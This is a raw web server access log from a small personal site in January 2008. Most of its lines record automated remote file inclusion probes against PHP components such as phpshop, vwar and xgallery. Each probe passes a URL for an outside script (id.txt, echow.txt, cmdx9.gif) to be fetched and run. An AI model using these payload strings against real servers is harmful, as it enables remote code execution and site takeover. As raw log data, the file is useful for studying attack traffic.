207.58.179.218 - - [25/Jan/2008:12:25:18 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:12:25:18 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:12:25:18 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:12:25:18 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.220.146.16 - - [25/Jan/2008:12:30:59 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.220.146.16 - - [25/Jan/2008:12:31:01 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.7.198.92 - - [25/Jan/2008:12:33:22 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:12:34:50 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:35:31 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:35:31 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:35:46 -0800] "GET /?cropimagedir=http://astroindo.org/box/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:36:56 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:36:57 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:36:57 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:36:57 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:36:57 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:36:57 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:01 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:04 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:05 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [25/Jan/2008:12:37:07 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:19 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:12:37:19 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.218.51.165 - - [25/Jan/2008:12:38:21 -0800] "GET //skin/zero_vote/error.php?dir=http://aggg.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.76 - - [25/Jan/2008:12:38:40 -0800] "GET /logs/access_071126.log HTTP/1.0" 200 40511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.171.102.74 - - [25/Jan/2008:12:38:58 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [25/Jan/2008:12:38:58 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [25/Jan/2008:12:42:00 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:12:42:51 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:46:19 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.81 - - [25/Jan/2008:12:47:26 -0800] "GET /bikes/dteel/10MAR07/?M=D HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.91 - - [25/Jan/2008:12:47:40 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.107 - - [25/Jan/2008:12:50:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.107 - - [25/Jan/2008:12:50:02 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.50.26 - - [25/Jan/2008:12:51:20 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [25/Jan/2008:12:51:20 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:51:43 -0800] "GET /logs/access_080106.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:51:44 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:12:52:27 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:12:52:27 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:12:52:28 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:12:55:14 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:12:55:14 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:12:55:30 -0800] "GET /logs/access_080106.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:55:51 -0800] "GET /logs/access.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:58:03 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:12:58:38 -0800] "GET /logs/access_080101.log/config.php?fpath=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:12:58:41 -0800] "GET /config.php?fpath=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:12:58:44 -0800] "GET /logs/config.php?fpath=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:59:07 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.205 - - [25/Jan/2008:13:01:17 -0800] "GET /logs/access_070702.log HTTP/1.0" 200 2893 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:13:04:18 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:13:05:28 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:13:06:19 -0800] "GET /logs/access_071230.log/?cropimagedir=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:13:06:20 -0800] "GET /logs/?cropimagedir=http://astroindo.org/box/id.txt? HTTP/1.1" 200 32337 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:13:06:37 -0800] "GET /search.php?cutepath=http://www.pcbcservice.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:13:06:37 -0800] "GET /logs/search.php?cutepath=http://www.pcbcservice.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
200.215.18.162 - - [25/Jan/2008:13:09:08 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.215.18.162 - - [25/Jan/2008:13:09:09 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.215.18.162 - - [25/Jan/2008:13:09:09 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:13:11:44 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/img.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:13:11:45 -0800] "GET /include/inc_ext/spaw/dialogs/img.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:13:11:45 -0800] "GET /logs/include/inc_ext/spaw/dialogs/img.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:13:13:53 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:13:14:09 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.103.159.12 - - [25/Jan/2008:13:17:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:13:17:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:13:19:24 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.50.26 - - [25/Jan/2008:13:20:28 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:13:23:16 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:13:23:16 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:13:23:17 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:13:23:17 -0800] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.200 - - [25/Jan/2008:13:24:52 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.254.203.35 - - [25/Jan/2008:13:25:46 -0800] "GET /logs/access_071230.log//bemarket/postscript/postscript.php?p_mode=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.254.203.35 - - [25/Jan/2008:13:25:46 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.254.203.35 - - [25/Jan/2008:13:25:47 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:13:28:06 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:28:21 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:28:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:13:28:25 -0800] "GET /logs/access_080101.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:13:28:26 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:13:28:26 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:28:28 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.148 - - [25/Jan/2008:13:29:09 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:13:31:33 -0800] "GET /logs/access_080106.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.103.159.12 - - [25/Jan/2008:13:32:43 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.12 - - [25/Jan/2008:13:32:44 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.145.197 - - [25/Jan/2008:13:33:06 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.197 - - [25/Jan/2008:13:33:06 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
74.6.23.139 - - [25/Jan/2008:13:33:32 -0800] "GET /megumi/Bracelet/?S=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:13:35:44 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:13:35:44 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:13:37:11 -0800] "GET /logs/access_071230.log//vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:13:37:11 -0800] "GET //vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:13:37:11 -0800] "GET /logs//vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:13:37:41 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:13:37:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:13:40:35 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:13:40:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:13:40:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:13:41:05 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:13:41:05 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:13:41:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.102 - - [25/Jan/2008:13:43:45 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:13:46:40 -0800] "GET /logs/access_080112.log/index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:13:46:41 -0800] "GET /index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.94 - - [25/Jan/2008:13:46:41 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:13:46:41 -0800] "GET /logs/index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:13:47:16 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:13:47:16 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
